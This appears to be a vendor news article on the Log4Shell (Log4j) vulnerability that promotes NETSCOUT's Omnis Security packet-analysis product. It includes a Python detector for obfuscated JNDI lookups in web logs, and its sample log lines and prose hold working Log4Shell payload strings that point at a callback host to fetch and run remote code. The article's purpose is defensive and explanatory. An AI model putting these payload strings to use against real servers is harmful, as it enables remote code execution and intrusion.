On December 09, 2021, the world was alerted to the Log4j vulnerability [CVE-2021-44228 aka Log4Shell]. It’s likely threat actors were already aware of the vulnerability before then, says NETSCOUT product marketing manager Tom Bienkowski, as the vulnerability was reported to have been exposed much earlier in the Minecraft discussion forums.
How does Log4j work – and what lessons does it provide?
Log4j, which is open source software provided by the Apache Software Foundation, logs errors and routine system operations and sends diagnostic messages about them to system administrators and users. A common example is when a user types or clicks on a wrong web link: the web server responds with a 404 message saying the page doesn't exist and, if it uses Log4j, also logs the event for the server's sysadmins. In Minecraft, Log4j is used by the server to record activity such as total memory used and user commands entered into the console.
Log4Shell abuses a Log4j feature called message lookup substitution: text of the form ${...} inside a log message is evaluated when the message is logged, and one of the supported lookups, ${jndi:...}, asks the Java Naming and Directory Interface to fetch an object from a remote LDAP or RMI server. Because Log4j routinely logs attacker-controlled input such as HTTP headers, an attacker only has to get a string like ${jndi:ldap://attacker-host/x} into something the server logs; the server then connects to the attacker's host, fetches code from it and runs it. This opens the door for threat actors to steal sensitive information and send malicious content to other users communicating with the affected server.
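As an added example (it is not NETSCOUT's code and does not come from the original article), the Python below shows what detection of this exploit string looks like when run over web-server access logs or reassembled HTTP requests. Log4Shell scanners wrapped the lookup in obfuscation that Log4j itself resolves, such as ${lower:j}, ${::-j} and ${env:NaN:-j}, so a plain search for "jndi:" misses them; the code first resolves those wrappers the way Log4j would and only then looks for a jndi: lookup. The log lines, IP addresses and ports are constructed for illustration.

```python
import re

# Constructed access-log lines (not real traffic). Payloads appear in the
# User-Agent and Referer fields, which are commonly logged verbatim.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:03:14:22 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.4 - - [10/Dec/2021:03:15:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:03:15:40 +0000] "GET /login HTTP/1.1" 302 0 "-" '
    '"${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.9:1389/b}"',
    '203.0.113.7 - - [10/Dec/2021:03:16:05 +0000] "GET /api HTTP/1.1" 200 88 '
    '"${${env:NaN:-j}ndi:rmi://203.0.113.9:1099/c}" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:03:16:31 +0000] "GET /x HTTP/1.1" 200 1 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.9:1389/d}"',
]

# An innermost ${...} expression: no nested braces inside it.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# A resolved JNDI lookup and the callback host it points at.
JNDI_LOOKUP = re.compile(
    r'jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/\s"}]+)', re.IGNORECASE
)


def _resolve(match):
    """Resolve one obfuscation wrapper the way Log4j's lookups would."""
    body = match.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":        # ${lower:J} -> j
        return rest.lower()
    if sep and head.lower() == "upper":        # ${upper:j} -> J
        return rest.upper()
    if ":-" in body:                           # ${env:NaN:-j} or ${::-j} -> default value
        return body.split(":-", 1)[1]
    return match.group(0)                      # unknown lookups (including jndi:) stay as-is


def normalize(text, max_rounds=20):
    """Repeatedly resolve innermost wrappers until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_line(line):
    """Return the JNDI lookups found in one line after de-obfuscation."""
    return [
        {"scheme": m.group(1).lower(), "target": m.group(2)}
        for m in JNDI_LOOKUP.finditer(normalize(line))
    ]


def scan_log(lines):
    """Scan access-log lines; the first field is taken as the client IP."""
    findings = []
    for number, line in enumerate(lines, 1):
        for hit in scan_line(line):
            findings.append({"line": number, "src": line.split(" ", 1)[0], **hit})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(finding)
```

A hit here proves only that an exploit attempt reached the logging path. Confirming exploitation means finding the outbound LDAP, RMI or DNS connection from the server to the callback host, which is exactly the traffic that log-based tooling does not see and where packet-level visibility is useful; and if the requests arrive over TLS, the headers have to be decrypted before any of this matching can be done.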
“This vulnerability alerts us that it is time to start paying attention to packet-based exploit investigations,” says Risna Steenkamp, Vendor Alliance Manager for NETSCOUT and Infoblox at Exclusive Networks Africa. “The problem with the Log4j vulnerability was that it could be exploited to download and execute common crypto-mining malware, web shells, Cobalt Strike beacons – and no doubt ransomware.”
Bienkowski notes that, “Scanning and patching your vulnerable servers (if you can find them all) is absolutely the best defense against this exploit. But it takes time – a lot of time. Therefore, it should be assumed that before or during this time, malicious actors have already compromised one or more of your vulnerable servers.”
He therefore advocates packet-based threat detection and investigation as one of the tools for detecting and remediating the exploitation of such a vulnerability, an area in which NETSCOUT specialises.
The challenge of visibility
Steenkamp continues, “In today’s complex network world – encompassing legacy networks, branch offices, home-based work situations, and public and private clouds – getting the right level of network visibility is more difficult than ever. The threat surface is expanding and the number of security tools has increased, resulting in siloed data. Overall, this means that a lack of comprehensive and consistent network visibility makes it harder for cybersecurity teams to conduct rapid and effective threat detection and response.
“Additionally, when new technologies are implemented quickly to meet business needs, it often means that security is compromised. This approach can limit visibility and create security blind spots, which attract threat agents. How do you protect yourself from threats you can’t see?”
NETSCOUT digs deep into the visibility challenge
NETSCOUT’s solution to this challenge is Omnis™ Security, an advanced threat analysis and response platform that provides comprehensive and consistent network visibility for effective cybersecurity.
NETSCOUT’s patented Smart Data technology provides unparalleled visibility by uniquely converting network packets into an intelligent source of data. NETSCOUT has now integrated this same technology into a cybersecurity solution that provides complete network visibility and more effective detection and response to cyber threats.
About NETSCOUT Omnis Security
Unlike Security Information and Event Management (SIEM), Endpoint Detection and Response (EDR), or User Behavior Analytics (UBA) security technologies, Omnis Security transforms data from packets into real-time threat detection indicators. It provides your team with relevant contextual data, enabling quick and decisive action, smarter investigation, and faster, more accurate remediation, as follows:
- You can identify the deep attack context and quickly assess the scope of the breach to isolate risk.
- You are able to remediate faster and more accurately than with non-network data sources alone.
- Vital forensic reports are created, for law enforcement and support of reporting obligations under legislation.
“In the event of a malware attack,” says Steenkamp, “NETSCOUT Omnis Security provides deep visibility into network traffic, including packet-level visibility that can also automatically create a robust set of metadata that gives visibility into all seven layers of the OSI model, and for many different protocols.
“Omnis further provides the ability to continuously capture and store this robust set of packet-based metadata for real-time and retrospective analysis. Additionally, Omnis infuses this packet-based data with multiple sources of threat intelligence, to automatically detect and perform analysis of this data, as well as the ability to perform high-performance decryption.
“While it’s true that you can’t protect yourself from danger you can’t see, it’s also true that in the network security environment, NETSCOUT is uniquely qualified to be your eyes,” she concludes.
NETSCOUT is distributed throughout Sub-Saharan Africa by Exclusive Networks Africa.
By staff writer.